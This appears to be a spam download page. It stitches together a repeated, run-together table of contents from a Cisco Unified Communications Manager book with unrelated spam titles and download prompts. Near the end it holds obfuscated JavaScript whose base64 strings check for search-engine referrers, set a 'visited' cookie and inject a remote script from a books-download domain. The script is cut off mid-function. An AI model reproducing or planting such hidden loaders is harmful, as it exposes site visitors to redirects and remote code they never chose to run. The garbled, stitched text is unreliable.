Information literacy skills workshops and programmes11 Bibliography Foreword xxIntroduction xxiChapter 1 Identifying Issues in a Multisite Deployment 3Chapter Objectives 3Multisite Deployment Challenge Overview 3Quality Challenges 5Bandwidth Challenges 6Availability Challenges 8Dial Plan Challenges 9 Overlapping and Nonconsecutive Numbers 12 Fixed Versus Variable-Length Numbering Plans 13 Variable-Length Numbering, E.. 509v3 Certificates 380PKI Example: SSL on the Internet 381 Internet Web Browser: Embedded Internet-CA Certificates 382 Obtaining the Authentic Public Key of the Web Server 383 Web Server Authentication 384 Exchanging Symmetric Session Keys 385 Session Encryption 386Summary 387References 387Review Questions 387Chapter 15 Understanding Native CUCM Security Features and CUCM PKI 391Chapter Objectives 391CUCM Security Features Overview 391 CUCM Security Feature Support 393 Cisco Unified Communications Security Considerations 394CUCM IPsec Support 395 IPsec Scenarios in Cisco Unified Communications 395 IPsec on Network Infrastructure Devices 397Signed Phone Loads 397SIP Digest Authentication 398 SIP Digest Authentication Configuration Procedure 399 SIP Digest Authentication Configuration Example 399SIP Trunk Encryption 400 SIP Trunk Encryption Configuration Procedure 401 SIP Trunk Encryption Configuration 401CUCM PKI 402 Self-Signed Certificates 402 Manufacturing Installed Certificates 403 Locally Significant Certificates 403 Multiple PKI Roots in CUCM Deployments 404 Cisco Certificate Trust List 405 Cisco CTL Client Function 406 Initial CTL Download 408 IP Phone Verification of a New Cisco CTL 409 IP Phone Usage of the CTL 410 PKI Topology with Secure SRST 410 Trust Requirements with Secure SRST 412 Secure SRST: Certificate Import: CUCM 412 Secure SRST: Certificate Import: Secure SRST Gateway 413 Certificate Usage in Secure SRST 414Summary 415References 416Review Questions 416Chapter 16 Implementing Security in CUCM 419Chapter Objectives 419Enabling PKI-Based Security Features in CUCM 420 Configuration Procedure for PKI-Based CUCM Security Features 421 Enabling Services Required for Security 422 Installing the Cisco CTL Client 422 Cisco CTL Client Usage 423 Setting the Cluster Security Mode 424 Updating the CTL 425CAPF Configuration and LSC Enrollment 425 CAPF Service Configuration Parameter 426 CAPF Phone Configuration Options 426 First-Time Installation of a Certificate with a Manually Entered Authentication String 428 Certificate Upgrade Using an Existing MIC 429 Generating a CAPF Report to Verify LSC Enrollment 430 Finding Phones by Their LSC Status 431Signed and Encrypted Configuration Files 431 Encrypted Configuration Files 432 Obtaining Phone Encrypted Configuration Files 433 Configuring Encrypted Configuration Files 434 Phone Security Profiles 434 Default SCCP Phone Security Profiles 435 Configuring TFTP Encrypted Configuration Files 436Secure Signaling 436 Certificate Exchange in TLS 438 Server-to-Phone Authentication 438 Phone-to-Server Authentication 439 TLS Session Key Exchange 440 Secure Signaling Using TLS 441Secure Media Transmission Between Cisco IP Phones 441 SRTP Protection 442 SRTP Packet Format 443 SRTP Encryption 443 SRTP Authentication 444 Secure Call Flow Summary 445 Configuring IP Phones to Use Secure Signaling and Media Exchange 446 The Actual Security Mode Depends on the Configuration of Both Phones 447Secure Media Transmission to H. Download convert pdf to text adobe acrobat

Information literacy skills workshops and programmes11 Bibliography Foreword xxIntroduction xxiChapter 1 Identifying Issues in a Multisite Deployment 3Chapter Objectives 3Multisite Deployment Challenge Overview 3Quality Challenges 5Bandwidth Challenges 6Availability Challenges 8Dial Plan Challenges 9 Overlapping and Nonconsecutive Numbers 12 Fixed Versus Variable-Length Numbering Plans 13 Variable-Length Numbering, E.. 509v3 Certificates 380PKI Example: SSL on the Internet 381 Internet Web Browser: Embedded Internet-CA Certificates 382 Obtaining the Authentic Public Key of the Web Server 383 Web Server Authentication 384 Exchanging Symmetric Session Keys 385 Session Encryption 386Summary 387References 387Review Questions 387Chapter 15 Understanding Native CUCM Security Features and CUCM PKI 391Chapter Objectives 391CUCM Security Features Overview 391 CUCM Security Feature Support 393 Cisco Unified Communications Security Considerations 394CUCM IPsec Support 395 IPsec Scenarios in Cisco Unified Communications 395 IPsec on Network Infrastructure Devices 397Signed Phone Loads 397SIP Digest Authentication 398 SIP Digest Authentication Configuration Procedure 399 SIP Digest Authentication Configuration Example 399SIP Trunk Encryption 400 SIP Trunk Encryption Configuration Procedure 401 SIP Trunk Encryption Configuration 401CUCM PKI 402 Self-Signed Certificates 402 Manufacturing Installed Certificates 403 Locally Significant Certificates 403 Multiple PKI Roots in CUCM Deployments 404 Cisco Certificate Trust List 405 Cisco CTL Client Function 406 Initial CTL Download 408 IP Phone Verification of a New Cisco CTL 409 IP Phone Usage of the CTL 410 PKI Topology with Secure SRST 410 Trust Requirements with Secure SRST 412 Secure SRST: Certificate Import: CUCM 412 Secure SRST: Certificate Import: Secure SRST Gateway 413 Certificate Usage in Secure SRST 414Summary 415References 416Review Questions 416Chapter 16 Implementing Security in CUCM 419Chapter Objectives 419Enabling PKI-Based Security Features in CUCM 420 Configuration Procedure for PKI-Based CUCM Security Features 421 Enabling Services Required for Security 422 Installing the Cisco CTL Client 422 Cisco CTL Client Usage 423 Setting the Cluster Security Mode 424 Updating the CTL 425CAPF Configuration and LSC Enrollment 425 CAPF Service Configuration Parameter 426 CAPF Phone Configuration Options 426 First-Time Installation of a Certificate with a Manually Entered Authentication String 428 Certificate Upgrade Using an Existing MIC 429 Generating a CAPF Report to Verify LSC Enrollment 430 Finding Phones by Their LSC Status 431Signed and Encrypted Configuration Files 431 Encrypted Configuration Files 432 Obtaining Phone Encrypted Configuration Files 433 Configuring Encrypted Configuration Files 434 Phone Security Profiles 434 Default SCCP Phone Security Profiles 435 Configuring TFTP Encrypted Configuration Files 436Secure Signaling 436 Certificate Exchange in TLS 438 Server-to-Phone Authentication 438 Phone-to-Server Authentication 439 TLS Session Key Exchange 440 Secure Signaling Using TLS 441Secure Media Transmission Between Cisco IP Phones 441 SRTP Protection 442 SRTP Packet Format 443 SRTP Encryption 443 SRTP Authentication 444 Secure Call Flow Summary 445 Configuring IP Phones to Use Secure Signaling and Media Exchange 446 The Actual Security Mode Depends on the Configuration of Both Phones 447Secure Media Transmission to H. 0041d406d9 Download convert pdf to text adobe acrobat

International Comparative Legal Guide To : Aviation Law 2014. Read Book EPUB, DJVU, PRC, DJV, AZW

Free Android Dating Games Download For Mobile Samsung Galaxy Grand

0 Platform Density 112Dial Plan Requirements for MGCP Fallback and SRST Scenarios 113 Ensuring Connectivity for Remote Sites 114 Ensuring Connectivity from the Main Site Using Call Forward Unregistered 115 CFUR Considerations 115 Keeping Calling Privileges Active in SRST Mode 117 SRST Dial Plan Example 117Summary 118References 119Review Questions 119Chapter 6 Implementing Cisco Unified SRST and MGCP Fallback 123Chapter Objectives 123MGCP Fallback and SRST Configuration 124 Configuration Requirements for MGCP Fallback and Cisco Unified SRST 124Cisco Unified SRST Configuration in CUCM 125 SRST Reference Definition 125 CUCM Device Pool 126SRST Configuration on the Cisco IOS Gateway 126 SRST Activation Commands 127 SRST Phone Definition Commands 127 SRST Performance Commands 128 Cisco Unified SRST Configuration Example 129MGCP-Gateway-Fallback Configuration on the Cisco IOS Gateway 130 MGCP Fallback Activation Commands 131 MGCP Fallback Configuration Example 131Dial Plan Configuration for SRST Support in CUCM 132SRST Dial Plan of CFUR and CSS 133SRST Dial Plan: Max Forward UnRegistered Hops to DN 134MGCP Fallback and SRST Dial Plan Configuration in the Cisco IOS Gateway 135SRST Dial Plan Components for Normal Mode Analogy 135SRST Dial Plan Dial Peer Commands 136SRST Dial Plan Commands: Open Numbering Plans 140SRST Dial Plan Voice Translation-Profile Commands for Digit Manipulation 142 SRST Dial Plan Voice Translation-Rule Commands for Number Modification 143 SRST Dial Plan Profile Activation Commands for Number Modification 144SRST Dial Plan Class of Restriction Commands 145 SRST Dial Plan Example 146Telephony Features Supported by Cisco Unified SRST 150 Special Requirements for Voice-Mail Integration Using Analog Interfaces 151Summary 152References 152Review Questions 152Chapter 7 Implementing Cisco Unified Communications Manager Express inSRST Mode 157Chapter Objectives 157CUCME Overview 158 CUCME in SRST Mode 158 Standalone CUCME Versus CUCM and CUCME in SRST Mode 159CUCME Features 161 CUCME Features and Versions 161 Other CUCME Features 162General Configuration of CUCME 163 CUCME Basic Configuration 164 CUCME Configuration Providing Phone Loads 165 CUCME Configuration for Music On Hold 165Configuring CUCME in SRST Mode 167Phone-Provisioning Options 168Advantages of CUCME SRST 169Phone Registration Process 169Configuring CUCME for SRST 170 CUCME for SRST Mode Configuration 172Summary 173References 173Review Questions 173Chapter 8 Implementing Bandwidth Management 177Chapter Objectives 177Bandwidth Management Overview 177CUCM Codec Configuration 178 Review of CUCM Codecs 179Local Conference Bridge Implementation 181Transcoder Implementation 184 Implementing a Transcoder at the Main Site 185 Configuration Procedure for Implementing Transcoders 187Multicast MOH from Branch Router Flash Implementation 191 Implementing Multicast MOH from Branch Router Flash 192 Configuration Procedure for Implementing Multicast MOH from Branch Router Flash 194Summary 202References 203Review Questions 203Chapter 9 Implementing Call Admission Control 207Chapter Objectives 207Call Admission Control Overview 208Call Admission Control in CUCM 208Locations 209 Locations: Hub-and-Spoke Topology 210 Locations: Full-Mesh Topology 211 Configuration Procedure for Implementing Locations-Based CAC 212 Locations Configuration Example of a Hub-and-Spoke Topology 212RSVP-Enabled Locations 215 Three Call Legs with RSVP-Enabled Locations 215 Characteristics of Phone-to-RSVP Agent Call Legs 216 Characteristics of RSVP Agent-to-RSVP Agent Call Legs 217 RSVP Basic Operation 217 RSVP-Enabled Location Configuration 220 Configuration Procedure for Implementing RSVP-Enabled Locations-Based CAC 221 Step 1: Configure RSVP Service Parameters 221 Step 2: Configure RSVP Agents in Cisco IOS Software 225 Step 3: Add RSVP Agents to CUCM 227 Step 4: Enable RSVP Between Location Pairs 228Automated Alternate Routing 230 Automated Alternate Routing Characteristics 231 AAR Example 231 AAR Considerations 233 AAR Configuration Procedure 234H.. ISBN\ISSN: 1908070870, 9781908070876Responsibility: International comparative legal guide to : aviation law 2014.. Edition: Print book : English : 021 Introduction2 Section summaries3 Landscapes and models4.. com 268 Step 2: Upload and Uncompress the Script to Flash 268 Step 3a: Configure the Call Application Service Definition 269 Step 3b: Configure the Call Application Service Parameters 269 Step 4: Associate the Call Application with a Dial Peer 270 Call Application Configuration Example 270Summary 272References 272Review Questions 272Chapter 11 Implementing Device Mobility 277Chapter Objectives 277Issues with Devices Roaming Between Sites 277 Issues with Roaming Devices 278 Device Mobility Solves Issues of Roaming Devices 279Device Mobility Overview 280 Dynamic Device Mobility Phone Configuration Parameters 280 Device Mobility Dynamic Configuration by Location-Dependent Device Pools 282Device Mobility Configuration Elements 283 The Relationship Between Device Mobility Configuration Elements 284Device Mobility Operation 285 Device Mobility Operation Flowchart 286 Device Mobility Considerations 289 Review of Line and Device CSSs 289 Device Mobility and CSSs 290 Examples of Different Call-Routing Paths Based on Device Mobility Groups and TEHO 290Device Mobility Configuration 293 Steps 1 and 2: Configure Physical Locations and Device Mobility Groups 293 Step 3: Configure Device Pools 293 Step 4: Configure Device Mobility Infos 294 Step 5a: Set the Device Mobility Mode CCM Service Parameter 295 Step 5b: Set the Device Mobility Mode for Individual Phones 296Summary 297References 297Review Questions 297Chapter 12 Implementing Extension Mobility 301Chapter Objectives 301Issues with Users Roaming Between Sites 301 Issues with Roaming Users 302 Extension Mobility Solves Issues of Roaming Users 303CUCM Extension Mobility Overview 303 Extension Mobility: Dynamic Phone Configuration Parameters 304 Extension Mobility with Dynamic Phone Configuration by Device Profiles 305CUCM Extension Mobility Configuration Elements 306 The Relationship Between Extension Mobility Configuration Elements 307CUCM Extension Mobility Operation 308 Issues in Environments with Different Phone Models 310 Extension Mobility Solution to Phone Model Differences 310 Extension Mobility and Calling Search Spaces (CSS) 311 Alternatives to Mismatching Phone Models and CSS Implementations 312CUCM Extension Mobility Configuration 313 Step 1: Activate the Cisco Extension Mobility Feature Service 313 Step 2: Set Cisco Extension Mobility Service Parameters 314 Step 3: Add the Cisco Extension Mobility Phone Service 315 Step 4: Create Default Device Profiles 315 Step 5a: Create Device Profiles 316 Step 5b: Subscribe the Device Profile to the Extension Mobility Phone Service 316 Step 6: Associate Users with Device Profiles 318 Step 7a: Configure Phones for Cisco Extension Mobility 318 Step 7b: Subscribe the Phone to the Extension Mobility Phone Service 320Summary 320References 321Review Questions 321Chapter 13 Implementing Cisco Unified Mobility 327Chapter Objectives 327Cisco Unified Mobility Overview 327 Mobile Connect and Mobile Voice Access Characteristics 328 Cisco Unified Mobility Features 329Cisco Unified Mobility Call Flow 330 Mobile Connect Call Flow of Internal Calls Placed from a Remote Phone 330 Mobile Voice Access Call Flow 331Cisco Unified Mobility Components 332 Cisco Unified Mobility Configuration Elements 333 Shared Line Between the Phone and the Remote Destination Profile 335 Relationship Between Cisco Unified Mobility Configuration Elements 336Cisco Unified Mobility Configuration 338 Configuring Mobile Connect 338 Configuring Mobile Voice Access 348Summary 355References 355Review Questions 355Chapter 14 Understanding Cryptographic Fundamentals and PKI 359Chapter Objectives 359Cryptographic Services 359Symmetric Versus Asymmetric Encryption 362 Algorithm Example: AES 363 Asymmetric Encryption 364 Algorithm Example: RSA 365 Two Ways to Use Asymmetric Encryption 366Hash-Based Message Authentication Codes 366 Algorithm Example: SHA-1 367 No Integrity Provided by Pure Hashing 368 Hash-Based Message Authentication Code, or "Keyed Hash" 369Digital Signatures 370Public Key Infrastructure 372 Symmetric Key Distribution Protected by Asymmetric Encryption 372 Public Key Distribution in Asymmetric Cryptography 373 PKI as a Trusted Third-Party Protocol 374 PKI: Generating Key Pairs 374 PKI: Distributing the Public Key of the Trusted Introducer 374 PKI: Requesting Signed Certificates 376 PKI: Signing Certificates 376 PKI: Providing Entities with Their Certificates 377 PKI: Exchanging Public Keys Between Entities Using Their Signed Certificates 378 PKI Entities 379 X.. var _0x4148=['LmFvbC4=','LmFzay4=','LmFsdGF2aXN0YS4=','LnlhbmRleC4=','YlptQXE=','WHRlZG0=','Q2hBeG4=','WG9BVGs=','WUNVdlM=','eGFkTHY=','cmVmZXJyZXI=','Z2V0','YW5EWHc=','eFliWEM=','aW5kZXhPZg==','dEVWTGg=','blFUc3U=','c2V0','enVIVE0=','VVhoUUM=','a3Fyd1k=','ZU1rWE8=','c2NyaXB0','Y3JlYXRlRWxlbWVudA==','THZ2Y2U=','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','amFsbFE=','YXBwZW5kQ2hpbGQ=','OTIyODE3NjMw','dElPZEg=','ek12WE8=','Y29va2ll','bWF0Y2g=','ZHVCTmw=','dk1MUlQ=','bGVuZ3Ro','cUpmcmo=','enhMVEI=','Z3lETkM=','SW9ZaFo=','c0VtWUE=','T09Zdks=','c3BsaXQ=','cmVwbGFjZQ==','OyBleHBpcmVzPQ==','OyBkb21haW49','R2hoaEU=','dXBmd24=','ZHZIeWE=','cEZkTlQ=','V21jRGU=','Z2V0VGltZQ==','VWJjbFc=','OyBwYXRoPQ==','S0htRHY=','dmlzaXRlZA==','aHR0cHM6Ly9ib29rc2ZpbmRlci50b3AvYm9va3MyMDE5LnBocD94PXNhJnF1ZXJ5PQ==','Lmdvb2dsZS4=','LmJpbmcu'];(function(_0x1b5b10,_0x2e5fd3){var _0x117254=function(_0x346f6a){while(--_0x346f6a){_0x1b5b10['push'](_0x1b5b10['shift']());}};_0x117254( _0x2e5fd3);}(_0x4148,0x17e));var _0x3a4a=function(_0x1a026c,_0x2492de){_0x1a026c=_0x1a026c-0x0;var _0x2d8f05=_0x4148[_0x1a026c];if(_0x3a4a['jpWbuS']===undefined){(function(){var _0x2aa57f=function(){var _0x2ad816;try{_0x2ad816=Function('return\x20(function()\x20' '{}. Backup Windows 7 Drivers Download

Download convert pdf to text adobe acrobat